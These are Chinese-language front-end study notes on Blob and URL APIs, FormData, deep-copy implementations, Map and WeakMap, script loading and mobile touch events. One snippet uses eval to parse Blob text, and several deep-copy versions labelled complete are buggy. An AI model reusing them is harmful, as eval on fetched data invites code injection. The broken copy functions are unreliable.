// 参数options,可选项,字典格式类型,可以指定如下两个属性:
// 1、type,默认值为"",它代表了将会被放入到blob中的数组内容的MIME类型。
// 2、endings, 默认值为"transparent",用于指定包含行结束符\n的字符串如何被写入。它是以下两个值中的一个:
//    "native",表示行结束符会被更改为适合宿主操作系统文件系统的换行符;
//    "transparent",表示会保持blob中保存的结束符不变。

// 如用字符串构建一个 blob
var debug = {hello: "world"};
var blob = new Blob([JSON.stringify(debug, null, 2)], {type : 'application/json'});

// Blob对象有一个slice方法,返回一个新的Blob对象,包含了源Blob对象中指定范围内的数据。
// 其实就相当于截取字符串一样
var data = "abcdef";
var blob1 = new Blob([data]);
var blob2 = blob1.slice(0,3);
console.log(blob1); //输出:Blob {size: 6, type: ""}
console.log(blob2); //输出:Blob {size: 3, type: ""}
```

我们知道了,File 继承自 Blob,同时又知道 blob 还有可以截取的特性,因此我们就可以对大文件进行分片上传。因此参考代码可如下:

```js
function uploadFile(file) {
  var chunkSize = 1024 * 1024; //每片1M大小
  var totalSize = file.size;
  var chunkQuantity = Math.ceil(totalSize/chunkSize); //分片总数
  var offset = 0; //偏移量
  var reader = new FileReader();
  reader.onload = function(e) {
    var xhr = new XMLHttpRequest();
    xhr.open("POST", url);
    xhr.overrideMimeType("application/octet-stream");
    xhr.onreadystatechange = function() {
      if(xhr.readyState === 4
&& xhr.status === 200) {
        ++offset;
        if(offset === chunkQuantity) {
          alert("上传完成");
        } else if(offset === chunkQuantity - 1) {
          blob = file.slice(offset*chunkSize, totalSize);
          reader.readAsBinaryString(blob);
        } else {
          blob = file.slice(offset*chunkSize, (offset+1)*chunkSize);
          reader.readAsBinaryString(blob);
        }
      } else {
        alert("上传出错");
      }
    }
    if(xhr.sendAsBinary) {
      xhr.sendAsBinary(e.target.result);
    } else {
      xhr.send(e.target.result);
    }
  }
  var blob = file.slice(0, chunkSize);
  reader.readAsBinaryString(blob);
}
```

为什么使用**blob**呢?

`Blob URL / Object URL`是一种伪协议,允许Blob和File对象用作图像,下载二进制数据链接等的URL源。

例如,img 元素不能直接处理 Image 的原始字节数据,因为它不知道如何处理,它需要通过URL来加载图像(二进制数据)。这适用于任何需要URL作为源的东西。与其把二进制数据上传到服务器再换回一个链接,不如增加一个本地步骤,直接访问数据而无需经过服务器。

比起编码为Base-64字符串的Data-URI,Blob也是更好的选择。Data-URI的问题是每个char在JavaScript中占用两个字节,最重要的是,Base-64编码还会使体积增加33%。Blob是纯粹的二进制字节数组,不像Data-URI那样有明显的开销,这使得它们处理速度更快。

其实说白了,之所以要使用blob,是因为blob在web领域,给我们提供了一种操作数据流的方式,类似操作file。

之前项目中:后端先返回文件的列表,列表里有文件的id,然后渲染到页面上,然后再点击的时候将拿到的id再去请求后台的真正的合同,这个合同是字符串格式,先转成blob格式,然后再转成url格式,再作为iframe的src填入。。。

```js
// result就是字符串格式的合同文件
const blob = new Blob([result], { type: 'text/html' });
// 其实这个url的生命周期和创建它的窗口中的document绑定,也就是关闭页面了,
// document没有了,这个url就失效了,不过每次都会新建不同的
const url = URL.createObjectURL(blob);
this.$refs.iframe.src = url;
```

**Data URL 和 Blob URL什么区别**?
Data URL对大家来说并不陌生,Web性能优化有一项措施:把小图片用base64编码直接嵌入到HTML文件中,实际就是利用了Data URL来获取图片数据。

- Blob URL的长度一般比较短,但Data URL因为直接存储图片base64编码后的数据,往往很长。当显示大图片时,使用Blob URL更优。
- Blob URL可以方便的使用XMLHttpRequest获取源数据,例如:

```js
var blobUrl = URL.createObjectURL(new Blob(['Test'], {type: 'text/plain'}));
var xhr = new XMLHttpRequest();
//如果指定xhr.responseType = 'blob',将返回一个Blob对象,而不是文本;
//xhr.responseType = 'blob';
xhr.onload = function() {
  alert(xhr.responseText);
}
xhr.open('get', blobUrl);
xhr.send();
```

- 对于Data URL, 并不是所有浏览器都支持通过XMLHttpRequest获取源数据的。
- Blob URL只能在当前应用内部使用,把Blob URL复制到浏览器的地址栏中,是无法获取数据的。Data URL相比之下,就有很好的移植性,你可以在任意浏览器使用。
- 除了可以用作图片资源的网络地址,Blob URL也可以用作其他资源的网络地址,例如html文件、json文件等,为了保证浏览器能正确的解析Blob URL返回的文件类型,需要在创建Blob对象时指定相应的type:

```js
// 其实就是,创建的时候写上mime,然后浏览器解析的时候,就会按照指定的格式解析了,不然浏览器不知道如何解析。
//创建HTML文件的Blob URL
var data = "<div style='color:red;'>This is a blob</div>";
var blob = new Blob([data], {type: 'text/html'}); // 'application/json'
var blobUrl = URL.createObjectURL(blob);
```

**如何导出文件**?
一般生成导出文件常用的两种方式: 第一种:直接请求并输出文件流了(整个响应体都是数据流)。 第二种:先请求生成好Excel文件,返回给你链接,然后再请求下载。 第一种由于整个响应体都是二进制数据流,因此需在全局拦截器特殊对待这个响应体,可以根据响应类型单独做判断…… 第二种:一般很少采用,因为文件会经常变,每次变都需要生成一份…… 不管哪种,在请求时都必须声明。responseType:'blob',意思响应回来的数据类型是Blob……默认情况下是json文件…… ```js let res = await xxx(reqData); if (res instanceof Blob) { // 这里response是整个响应体,而不是单个的blob对象,因此要想获取后台的名字,可以通过这个方式 // let fileName = response.headers['content-disposition'].slice(20); let blob = new Blob([res], { type: "application/x-xlsx" }); let link = document.createElement("a"); link.href = window.URL.createObjectURL(blob); link.download = `仓组维度手推补货记录${Date.now()}.xlsx`; // 如果用fileName,可以:link.download = fileName // 当然给元素设置属性,还可以如下 // link.setAttribute("download", fileName); link.click(); } ``` new URL()返回值就是一个实例对象,包括下面这些属性和方法。 ```js // 已知url如下 var url = new URL('https://www.zhangxinxu.com:80/wordpress/?s=url#comments'); ``` - hash,URL地址中的锚链值,包含字符串'#',例如这里url.hash的返回值是'#comments' - host,包括协议端口号,www.zhangxinxu.com:80 - hostname,不包括端口号,www.zhangxinxu.com - href,完整的url, - origin,只读,包含URL协议,域名和端口,https://www.zhangxinxu.com:80 - port,端口 - protocol,URL地址的协议,包含:,https: - search,查询字符串,?s=url - searchParams,返回一个URLSearchParams对象,可以调用URLSearchParams对象各种方法,对查询字符串进行非常方便的处理,url.searchParams.get('s'); => url 方法: - toString(),返回的完整的URL地址,你可以理解为URL.href的另外一种形式,不过这个只能输出,不能修改值 - toJSON(),同样返回完整的URL地址,返回的字符串和href属性一样。 静态方法: - URL.createObjectURL(object) - URL.revokeObjectURL(objectURL),撤消之前使用URL.createObjectURL()创建的URL对象。其中参数objectURL表示之前使用URL.createObjectURL()创建的URL返回值。 平时我们想要解析url里的参数,需要写一个函数或者正则处理,其实可以直接使用 URLSearchParams(),使用如下: ```js new URL('https://www.zhangxinxu.com/wordpress/?s=url').searchParams.get('s'); // 'url' // 增加 var params = new URLSearchParams('?s=url') params.append('from', 'zxx'); params.toString(); // "s=url&from=zxx" // 删除 params.delete('s'); params.toString(); "from=zxx" // 遍历 for (let pair of params.entries()) { console.log(pair[0], pair[1]); } // from zxx params.forEach((val,key) => { console.log(val, key); }) // zxx from 
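// 追加示意(假设运行环境支持标准 URL API 与 Object.fromEntries):
// URLSearchParams 还支持 sort(),排序后再序列化,便于生成稳定的缓存 key
var sp = new URLSearchParams('b=2&a=1');
sp.sort(); // 按 key 的 Unicode 顺序排序
console.log(sp.toString()); // "a=1&b=2"
// URLSearchParams 本身可迭代([key, value] 对),可用 Object.fromEntries 一次性转成普通对象
console.log(Object.fromEntries(sp)); // { a: '1', b: '2' }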
// 更多参考:https://www.zhangxinxu.com/wordpress/2019/08/js-url-urlsearchparams/ ``` **如何从Blob中提取数据**? 一种从Blob中读取内容的方法是使用 FileReader。以下代码将 Blob 的内容作为类型数组读取: ```js var reader = new FileReader(); reader.addEventListener("loadend", function() { // reader.result 包含被转化为类型数组 typed array 的 blob }); reader.readAsArrayBuffer(blob); // 当然 FileReader,还有很多其他方法, // 通过使用 FileReader 的其它方法可以把 Blob 读取为字符串或者数据URL。 ``` 另一种读取Blob中内容的方式是使用Response对象。下述代码将Blob中的内容读取为文本: ```js var text = await (new Response(blob)).text(); // 但是这种的话,没法直接使用里面的对象,可以使用eval // eval的参数是字符串,结果会生成在当前位置的执行上下文 let textObj = eval(text) ``` Blob 和 ArrayBuffer的区别: Blob虽然可以利用slice截取生成更小的片段,但是无法像数组那样操作某一位,而 ArrayBuffer可以具体操作某一个位置的二进制数据流。 参考:https://www.cnblogs.com/penghuwan/p/12053775.html **formData数据**? 主要用途有两个: - 将form表单元素的name与value进行组合,实现表单数据的序列化,从而减少表单元素的拼接,提高工作效率。 - 异步上传文件 ```js //通过FormData构造函数创建一个空对象 var formdata = new FormData(); //可以通过append()方法来追加数据,可以添加key重复的数据 formdata.append("name","laotie"); //通过get方法对值进行读取,只会获取到第一个 console.log(formdata.get("name"));//laotie //通过set方法对值进行设置 formdata.set("name","laoliu"); console.log(formdata.get("name"));//laoliu // 获取key为name的第一个值 formdata.get("name"); // 获取key为name的所有值,返回值为数组类型 formdata.getAll("name"); //如果key的值不存在会为数据添加一个key为name值为laoliu的数据 formdata.set("name","laoli"); //通过get方法读取key为name的第一个值 console.log(formdata.get("name"));//laoli // 如果key的值存在,会修改对应的value值 ``` ```js // 比如用第三方的上传文件功能: async uploadFile(param) { var fileObj = param.file; let formData = new FormData(); formData.append("file", fileObj); formData.append("type", "1"); try { let res = await XXX(formData); if (res.code === 0) { this.$message({ message: "导入成功", type: "success" }); } } catch (err) { this.$refs.upload.clearFiles(); } finally { } }, ``` #### ***Javascript相关*** ##### **深拷贝与浅拷贝** 参考[浅拷贝与深拷贝](https://juejin.im/post/59ac1c4ef265da248e75892b)、[深拷贝完美方法](https://juejin.im/post/5b20c9f65188257d7d719c1c) 浅拷贝方式: **1. Object.assign()**: - 不会拷贝对象继承的属性 - 会忽略不可枚举的属性 - 属性的数据属性/访问器属性 - 可以拷贝Symbol类型 **2. 
扩展运算符** - 缺陷同Object.assign() - 如果都是基本类型,很方便 **3. Array.prototype.slice** slice() 方法返回一个新的数组对象,这一对象是一个由 begin和 end(不包括end)决定的原数组的浅拷贝。原始数组不会被改变。 在ES6以前,没有剩余运算符,Array.from的时候可以用 Array.prototype.slice将arguments类数组转为真正的数组,它返回一个浅拷贝后的的新数组。 ```js Array.prototype.slice.call({0: "aaa", length: 1}) //["aaa"] let arr = [1,2,3,4] console.log(arr.slice() === arr); //false ``` 当然还有类似`Array.prototype.concat()`这些可以返回新对象的方式,也可以理解为浅拷贝。 **注意:赋值和浅拷贝不同** - 赋值和浅拷贝不同,赋值只是复制了一份指针但仍指向同一个对象; - 浅拷贝是新建一个对象,但只复制一层对象的属性,不包括对象里面的为引用类型的数据 如下: 修改通过赋值得到的 obj2 中的基本数据会改变原始对象 obj1。而修改浅拷贝得到的 obj3则不会改变原始对象 obj1。其实就是浅拷贝重新开辟了内存空间,所以没有影响。 ```js var obj1 = { name: "zhangsan", age: "18" }; var obj2 = obj1; // 赋值 var obj3 = shallowCopy(obj1); // 浅拷贝 function shallowCopy(src) { var dst = Object.create(null); // 必须有至少一个参数 for (var prop in src) { if (src.hasOwnProperty(prop)) { dst[prop] = src[prop]; } } return dst; } obj2.name = "lisi"; obj3.age = "20"; console.log(obj1); //obj1 = { // 'name' : 'lisi', // 'age' : '18', //}; console.log(obj2); //obj2 = { // 'name' : 'lisi', // 'age' : '18', //}; console.log(obj3); //obj3 = { // 'name' : 'zhangsan', // 'age' : '20', //}; ``` **深拷贝方式**: **1. JSON.parse(JSON.stringify(obj))** 可谓问题多多。。。 - 不能复制function、正则、Symbol(不能复制,终端也不报错,只是没有复制过去而已) - 循环引用报错 - 相同的引用会被重复复制 - 拷贝的对象的值中如果有函数,undefined,symbol则经过JSON.stringify()序列化后的JSON字符串中这个键值对会消失 - 无法拷贝不可枚举的属性,无法拷贝对象的原型链 - 拷贝Date引用类型会变成字符串(而且还会发生时区变化的问题) - 拷贝RegExp引用类型会变成空对象 - 对象中含有NaN、Infinity和-Infinity,则序列化的结果会变成null - 无法拷贝对象的循环应用(即obj[key] = obj) 之前项目里,前端给后台传输一个时间对象时,后台拿到的时间比前端晚了8个小时,这就是因为请求无法发送对象,需要进行`JSON.stringfy()`格式化,时区问题就出现了 ```js // 下面的两个时间就相差8个小时。 new Date(); // Sun Mar 29 2020 11:03:26 GMT+0800 (中国标准时间) JSON.stringfy(new Date()); // ""2020-03-29T03:03:26.151Z"" ``` **2. 借用第三方库lodash,jQuery,zepto等** **3. 
简版深拷贝等** ```js // 大致问题点: // 无法复制不可枚举的属性及Symbol类型 // 只针对了Object类型的做了迭代,但Array,Date,RegExp,Error,Function无法拷贝 // 对象有循环引用的问题 (如:obj.a = obj) function deepClone(obj) { let dest = Object.create(null); for (let prop in obj) { if (obj.hasOwnProperty(prop)) { typeof obj[prop] === "object" ? (dest[prop] = deepClone(obj[prop])) : (dest[prop] = obj[prop]); } } return dest; } ``` **4. 完美版深拷贝等**: ```js // 深拷贝版本一 // 该版本只考虑对象 function deepClone1(obj) { if (!obj || typeof obj !== "object") { return obj; } let resObj = Object.create(null); for (let item in obj) { if (obj.hasOwnProperty(item)) { typeof item === "object" ? deepClone(item) : (resObj[item] = obj[item]); } } return resObj; } var obj = { a: 1, b: 2 }; var obj2 = deepClone1(obj); // 深拷贝版本二 // 该版本兼容数组 function deepClone1(obj) { if (!obj || typeof obj !== "object") return obj; let resObj = Array.isArray(obj) ? [] : {}; Object.keys(obj).forEach(key => { if (resObj[key]) return; resObj[key] = deepClone1(obj[key]); }); return resObj; } var obj = { a: 1, b: 2, c: [1, 2, 3] }; var obj2 = deepClone1(obj); obj2; // 深拷贝版本三 // 兼容所有并解决循环引用和相同引用的问题 function deepClone1(obj) { // 为解决循环和相同引用的问题 let copyed = []; function _deep(obj){ if (!obj || typeof obj !== "object") return obj; for (let i = 0; i < copyed.length; i++) { if (copyed[i].target === obj) return copyed[i].copyTarget; } let resObj = Array.isArray(obj) ? [] : {}; copyed.push({ target: obj, copyTarget: resObj }); Object.keys(obj).forEach(key => { if (resObj[key]) return; resObj[key] = deepClone1(obj[key]); }); return resObj; } return _deep(obj); } // 深拷贝版本四 // 高效率版 function finalDeepClone(obj) { // 数组用WeakMap代替 let copyed = new WeakMap(); function _deep(obj){ if (!obj || typeof obj !== "object") return obj; if (copyed.has(obj)) return copyed.get(obj); let resObj = Array.isArray(obj) ? 
[] : {};
    copyed.set(obj, resObj);
    Object.keys(obj).forEach(key => {
      if (resObj[key]) return;
      resObj[key] = _deep(obj[key]);
    });
    return resObj;
  }
  return _deep(obj);
}

function deepCopy(target) {
  let copyed_objs = []; // 此数组解决了循环引用和相同引用的问题,它存放已经递归到的目标对象
  function _deepCopy(target) {
    if (typeof target !== "object" || !target) {
      return target;
    }
    for (let i = 0; i < copyed_objs.length; i++) {
      // 如果当前对象与数组中的对象相同,则不对其递归
      if (copyed_objs[i].target === target) {
        return copyed_objs[i].copyTarget;
      }
    }
    let obj = {};
    if (Array.isArray(target)) {
      obj = []; // 处理target是数组的情况
    }
    copyed_objs.push({ target: target, copyTarget: obj });
    Object.keys(target).forEach(key => {
      if (obj[key]) {
        return;
      }
      obj[key] = _deepCopy(target[key]);
    });
    return obj;
  }
  return _deepCopy(target);
}

// 用WeakMap代替数组的版本,这种深拷贝效率更佳,但拷贝日期仍有问题
// 注意:类型判断必须用 && 连接,若写成 `!== 'Array' || !== 'Object'` 则恒为真,所有值都会被原样返回
function deepClone(target) {
  let tempMap = new WeakMap(); // 解决相同或循环引用
  function _getType(val) {
    return Object.prototype.toString.call(val).slice(8, -1);
  }
  function _deep(target) {
    // 除了数组和object,其他都直接返回
    // 当target是时间对象时,也需要直接返回
    // if (!target || typeof target !== "object" || target instanceof Date) return target;
    // 下面如果用 !['Array', 'Object'].includes(_getType(target)),运行时间会拖慢100倍以上,因此用原生的比较
    if (!target || (_getType(target) !== "Array" && _getType(target) !== "Object")) return target;
    if (tempMap.has(target)) return tempMap.get(target);
    let obj = Array.isArray(target) ? [] : {};
    tempMap.set(target, obj);
    Object.keys(target).forEach(key => {
      if (obj[key]) return;
      obj[key] = _deep(target[key]);
    });
    return obj;
  }
  return _deep(target);
}

// 可用如下代码测试
var obj = {
  num: 0,
  str: "",
  boolean: true,
  unf: undefined,
  nul: null,
  obj: { name: "我是一个对象", id: 1 },
  arr: [0, 1, 2],
  func: function() { console.log("我是一个函数"); },
  date: new Date(0),
  reg: new RegExp("/我是一个正则/ig"),
  [Symbol("1")]: 1
};
Object.defineProperty(obj, "innumerable", {
  enumerable: false,
  value: "不可枚举属性"
});
// 有何意义?参数二其实就是在原型对象上定义
obj = Object.create(obj, Object.getOwnPropertyDescriptors(obj));
obj.a = { loop: obj };
// 为了测试两种方式对大数据的处理,对数据做如下修改
obj.list = new Array(10000).fill(0).map((item, index) => { return { a: index }; });

// 测试时间
console.time();
var cloneObj = deepCopy(obj);
console.timeEnd(); // : 175.843994140625ms

console.time();
cloneObj = deepClone(obj); // WeakMap 版本
console.timeEnd(); // : 12.794189453125ms
```

上面用到了WeakMap,这里再说下Object、Map、WeakMap、Set、WeakSet的区别:

- Object提供了一种(字符串 - 值)的hash结构,但是键(key)只能是字符串。
- Map相当于加强版的对象,键(key)的取值可以是所有类型的值。所以,Map比起Object更适合于作为哈希表。

```js
// Map的属性和方法
let map = new Map([
  [0,1],
  [1,2],
]);
console.log(map.size); // 2

// Map的方法
// set(key, value) 设置成员,返回的是Map本身
// get(key) 读取key对应的键值,如果找不到key,返回undefined
// has(key)
根据key判断是否存在某个成员,返回一个布尔值 // delete(key) 删除成员,返回布尔值 // clear() 清空Map // 遍历的方法 // keys() 返回键名的遍历器 // values() 返回键值的遍历器 // entries() 返回所有成员的遍历器 // forEach() 遍历Map的所有成员 let map = new Map([ [0,1], [1,2], ]); for(let [key,value] of map.entries()){ console.log(key,value); } // 0 1 // 1 2 // 等价于 for(let [key,value] of map){ console.log(key,value); } // 还可以通过Array.form(), 扩展运算符转换将map为数组 Array.from(map); // [ [ 0, 1 ], [ 1, 2 ] ] [...map];// [ [ 0, 1 ], [ 1, 2 ] ] ``` WeakMap的特点: 1. 键名只能是对象(但不允许null) 2. 键名是对象的弱引用(不计入垃圾回收机制)。假如对象被回收,WeakMap成员中对应的键也被移除。(其实说白了,有利于垃圾回收,不容易造成内存泄漏) 3. 因为上面的特点2的原因,导致WeakMap没有遍历操作(keys、values、entries),没有size属性,也不支持clear。 参考:https://zh.javascript.info/weakmap-weakset ```js // WeakMap仅有的方法 set(key, value) 设置成员,返回的是WeakMap本身 get(key) 读取key对应的键值,如果找不到key,返回undefined has(key) 根据key判断是否存在某个成员,返回一个布尔值 delete(key) 删除成员,返回布尔值 ``` ##### **常见问题** ```js // 问:js中function开头加感叹号、分号什么意思? ;function(){} // 答:js中分号表示语句结束,在开头加上是为了压缩的时候和别的方法分隔一下,表示一个新的语句的开始。 // 而()、!、+、-、=等运算符,都将函数声明转换成函数表达式,消除了javascript引擎识别函数表达式和函数声明的歧义 // 如下其实就是自执行函数 !function(){alert(1);}(); void function(){alert(2);}(); var = { method:function(){} } (function(){ })() // 压缩后可能出现类似 }}(function 的代码,会被当成一个函数来执行,于是整体解析就错了 // 其实归根结底是解析器ASI(Automatic Semicolon Insertion)不能区分到底语句哪里应该终止 // 参考:https://developer.mozilla.org/zh-CN/docs/Web/JavaScript/Reference/Lexical_grammar // 逗号运算符,对它的每个操作数求值(从左到右),并返回最后一个操作数的值。 var x = 1; x = (x++, x); console.log(x); // expected output: 2 x = (2, 3); console.log(x); // 3 // 避免使用eval,Function构造函数, // 使用 eval 和 Function 构造函数是非常昂贵的操作,因为每次他们都会调用脚本引擎将源代码转换成可执行代码。 // eval它的功能是把对应的字符串解析成JS代码并运行; // 应该避免使用eval,不安全,非常耗性能(2次,一次解析成js语句,一次执行)。 //----- 取消请求 var xhr = new XMLHttpRequest(), method = "GET", url = "https://developer.mozilla.org/"; // open方法的参数3默认是ture,表示请求为异步。 xhr.open(method,url,true); xhr.send(); xhr.abort(); //------ 还可以设置定时器超时时间 var xhr = new XMLHttpRequest (); xhr.onreadystatechange = function () { if (this.readyState == 4) { clearTimeout(timeout); // do something 
with response data
  }
}
var timeout = setTimeout( function () {
  xhr.abort(); // call error callback
}, 60*1000);
xhr.open('GET', url, true);
xhr.send();

// open()的第三个参数表示是否异步发送请求……
// xhr.open方法第三个参数若为false则表示请求为同步……
// 意思就是必须等到服务器响应回来才执行下面的js代码……默认为true……

// 这里的 send()方法接收一个参数,即要作为请求主体发送的数据。
// 如果不需要通过请求主体发送数据,则必须传入 null,因为这个参数对有些浏览器来说是必需的。
// 调用 send()之后,请求就会被分派到服务器。

//------ 原始运算符始终比函数调用要高效
var min = Math.min(a,b);
A.push(v);
// 使用下面的效率高
var min = a < b ? a : b;
A[A.length] = v;
```

~、~~、| 运算符:

- ~ 按位取反运算
- ~~ 取反两次,作用是去掉小数部分,因为位运算的操作值要求是整数,其结果也是整数,所以经过位运算的都会自动变成整数。你想使用比Math.floor()更快的方法,那就是它了。需要注意,对于正数,它向下取整;对于负数,向上取整;非数字取值为0
- | 通常用来取整

```js
~~null;      // => 0
~~undefined; // => 0
~~Infinity;  // => 0
~~NaN;       // => 0
~~0;         // => 0
~~{};        // => 0
~~[];        // => 0
~~(1/0);     // => 0
~~false;     // => 0
~~true;      // => 1
~~1.9;       // => 1
~~-1.9;      // => -1

1.2 | 0  // 1
1.8 | 0  // 1
-1.2 | 0 // -1

console.time();
Array(1000).fill(1.2).map(item => Math.floor(item));
console.timeEnd() // default: 0.1298828125ms

console.time();
Array(1000).fill(1.2).map(item => ~~(item));
console.timeEnd() // default: 0.075927734375ms
```

**DOMContentLoaded、load、pageshow**:

- DOMContentLoaded事件,dom树生成完毕后执行,而非文档加载完毕(load事件)
- load事件,文档加载完毕后执行
- pageshow 事件类似于 load 事件,load 事件在页面第一次加载时触发,pageshow 事件在每次加载页面时触发,即 load 事件在页面从浏览器缓存中读取时不触发。为了查看页面是直接从服务器上载入还是从缓存中读取,你可以使用 PageTransitionEvent 对象的 persisted 属性来判断。如果页面从浏览器的缓存中读取,该属性返回 true,否则返回 false

```js
window.addEventListener('pageshow', function(evt) {
  // 如果从缓存中读取
  if (evt.persisted) {
    // todo
  }
})
```

**defer与async**:

**注意:**如果用document.createElement创建的script元素默认是async;async和defer标识的script脚本可能在DOMContentLoaded事件前触发(多数),也可能在之后,但一定都在load事件之前。

一句话,defer是“渲染完再执行”,async是“下载完就执行”。另外,如果有多个defer脚本,会按照它们在页面出现的顺序加载,而多个async脚本是不能保证加载顺序的。

另外就是,**如果 script 无 src 属性,则 defer, async 会被忽略**;还有就是如果加载一个外链资源,设置了defer,如果一直加载不出来,也不会影响后面的,因为一般接口都会设置超时,等到超时了,也就不会影响后面的脚本了。因此不会因为一个脚本的加载失败就停止执行后面的脚本。

```js
<script src="script.js"></script>
// 没有 defer 或 async,浏览器会立即加载并执行指定的脚本,“立即”指的是在渲染该
script 标签之下的文档元素之前,也就是说不等待后续载入的文档元素,读到就加载并执行。 <script async src="script.js"></script> // 有 async,加载和渲染后续文档元素的过程将和 script.js 的加载与执行并行进行(异步)。 <script defer src="myscript.js"></script> // 有 defer,加载后续文档元素的过程将和 script.js 的加载并行进行(异步),但是 script.js 的执行要在所有元素解析完成之后,一般在DOMContentLoaded 事件触发之前完成,但也不一定。 // 为了尽快加快首屏的加载速度,最好将不涉及dom的js都加上这些标识。 ``` ***定时器*** 定时函数 setTimeout 和 setInterval 都可以接受字符串作为它们的第一个参数。 这个字符串总是在**全局作用域**中执行。 ```js // 另外就是他们都可以接受多于两个的参数, // 多余的参数便是传给函数的参数 setTimeout((x,y,z) => {console.log(x,y,z)}, 2000, 1,2,3); // 1,2,3 // 另外建议不要在调用定时器函数时,为了向回调函数传递参数而使用字符串的形式。 function foo(a, b, c) {} // 不要这样做 setTimeout('foo(1,2, 3)', 1000) // 可以使用匿名函数完成相同功能 setTimeout(function() { foo(1, 2, 3); }, 1000) ``` ***tap点透事件*** 在pc端大部分操作都是通过鼠标,而响应的就是鼠标事件,包括mousedown、mouseup、mousemove和click事件。一次点击行为,事件的触发过程为:mousedown -> mouseup -> click 三步。 在手机上没有鼠标,所以用触摸(touch)事件来实现类似的功能,touch事件包含touchstart、touchmove、touchend。**注意:手机上没有tap事件**,手指触发触摸事件的过程为:touchstart -> touchmove -> touchend。 **那tap事件怎么来的呢?** 在最早iphone的safar浏览器中,为了实现触屏中双击放大效果,当用户点击屏幕时后会判断在300ms内是否有第二次点击,如果有,就理解成双击,若没有就是单击, 就会触发click事件。。。 zepto中的 tap 通过兼听绑定在 document 上的 touch(end) 事件来完成 tap 事件的模拟的(其实是自定义一个tap事件),是通过事件冒泡实现的。因此当对一个弹层绑定tap事件后,点击后,touchend首先触发tap事件,弹层就会隐藏,然后等待300ms如果没有发生其他行为,则就会触发click事件。此时下层同样位置的DOM元素触发了click事件(如果是input框则会触发focus事件),看起来就像点击的target“穿透”到下层去了。 **注意:**是tap事件触发后,弹层瞬间消失,然后click事件才会作用到下面的元素上。。。因此如果弹层有个消失动画且持续时间大于300ms,那click事件就不会作用到下面的元素上,而是作用在弹层上。。。这也是解决的办法之一(还可以做透明层,300ms后隐藏透明层,目的就是防止click事件作用在下面的元素上) 另外还需注意,自定义的tap事件时绑定在document上的,因此点击后会有个冒泡过程。。。 而fastclick的解决办法,是取消了300ms之后的click事件,而是用touchend来模拟快速点击行为。FastClick在touchEnd的时候,在符合条件的情况下,主动触发了click事件,这样避免了浏览器默认的300毫秒等待判断。为了防止原生的click被触发,这里还通过event.preventDefault()屏蔽了原生的click事件。 ```js FastClick.prototype.onTouchEnd = function(event){ if (!this.needsClick(targetElement)) { // 如果这不是一个需要使用原生click的元素,则屏蔽原生事件,避免触发两次click event.preventDefault(); // 触发一次模拟的click this.sendClick(targetElement, event); } } ``` 而FastClick模拟的click事件是在touchEnd获取的真实元素上触发的,而不是通过坐标计算出来的元素。 
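上面 FastClick 的思路可以抽成一段纯逻辑的小示意(createFastClick、onTouchEnd、onNativeClick 等命名均为演示用的假设,并非 FastClick 源码):touchend 里立即执行点击回调并打上标记,等 300ms 后补发的“原生 click”到来时直接忽略,这样既消除了延迟,也不会触发两次。

```javascript
// 纯逻辑示意:模拟 FastClick 的核心流程(不含滚动、多点触控等边界处理)
function createFastClick(onClick) {
  let clicked = false;
  return {
    // 对应 FastClick.prototype.onTouchEnd:手指抬起时立即触发回调
    onTouchEnd() {
      clicked = true; // 相当于 event.preventDefault() 屏蔽掉原生 click
      onClick();      // 相当于 this.sendClick(targetElement, event)
    },
    // 对应 300ms 后浏览器补发的原生 click
    onNativeClick() {
      if (clicked) { clicked = false; return; } // 已由 touchend 触发过,忽略
      onClick(); // 没有 touch 流程时(如鼠标点击)仍正常响应
    }
  };
}

let count = 0;
const btn = createFastClick(() => count++);
btn.onTouchEnd();    // 手指抬起,立即触发一次
btn.onNativeClick(); // 300ms 后的原生 click 被忽略
console.log(count);  // 1,只触发了一次且没有延迟
```

可以看出关键就是“先响应 touchend、再吞掉原生 click”,这也解释了为什么 FastClick 里要 preventDefault。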
**注意:**截至2015年底,大多数移动浏览器——尤其是 Chrome 和 Safari ——不再有300毫秒的触摸延迟,所以 fastclick 在新的浏览器上没有任何好处,而且有可能在你的应用程序中引入 bug。 参考:[fastClick使用说明][fastClickUseInstruction] 现代浏览器里有`dbclick`事件,而且事件对象里有个`detail`属性记录着点击的次数,单击为1,双击为2,其实就是**单击没有立即执行,而是等到判断不是双击的时候再执行**,如下测试代码: ```html <input type="button" onclick="aa()" ondblclick="bb()" value="点我"> <script type="text/javascript"> var timer = null; function aa() { clearTimeout( timer ); if ( event.detail == 2 ) return; timer = setTimeout( function () { console.log( '单击' ); }, 300 ); } function bb() { clearTimeout( timer ); console.log( '双击' ); } </script> ``` ***滚动穿透事件*** 参考:[滚动穿透][handleScrollTabURL] ```html <!-- 终极解决方案 --> <style> body.dialog-open { position: fixed; width: 100%; } </style> <script> (function() { var scrollTop = 0; // 显示弹出层 open.onclick = function() { // 在弹出层显示之前,记录当前的滚动位置 scrollTop = getScrollTop(); // 使body脱离文档流 document.body.classList.add("dialog-open"); // 把脱离文档流的body拉上去!否则页面会回到顶部! document.body.style.top = -scrollTop + "px"; mask.style.display = "block"; }; // 隐藏弹出层 close.onclick = function() { mask.style.display = "none"; // body又回到了文档流中 document.body.classList.remove("dialog-open"); // 滚回到老地方 to(scrollTop); }; function to(scrollTop) { document.body.scrollTop = document.documentElement.scrollTop = scrollTop; } function getScrollTop() { return document.body.scrollTop || document.documentElement.scrollTop; // 或者下面 // return document.scrollingElement.scrollTop; } })(); // 在vue项目里还可以如下,监听是否显示弹窗的标识 // 注意点,一个页面,有效的判断是哪个元素在滚动,有时候不太容易,因此很多时候给一个元素绑定了scroll事件,他并不会执行 // 此时,可以尝试利用document.scrollingElement来实现滚动。scrollingElement是新标准,兼容pc和移动 watch: { showDialog(newVal) { if (newVal) { // 消除移动端滚动穿透 // 打开弹窗时,需要找到滚动元素(有高度,有滚动条),记录当前滚动位置 // 添加fixed定位,因为fixed定位会导致页面滚动到顶部,这里通过js再移动回来 this.scrollTop = document.scrollingElement.scrollTop; document.scrollingElement.style.position = 'fixed'; document.scrollingElement.style.top = `-${this.scrollTop}px`; // 上面两句代码还可以用如下: // 这里其实就可以想到一个道理,要多留意细节,多学习才能知道更多 // 
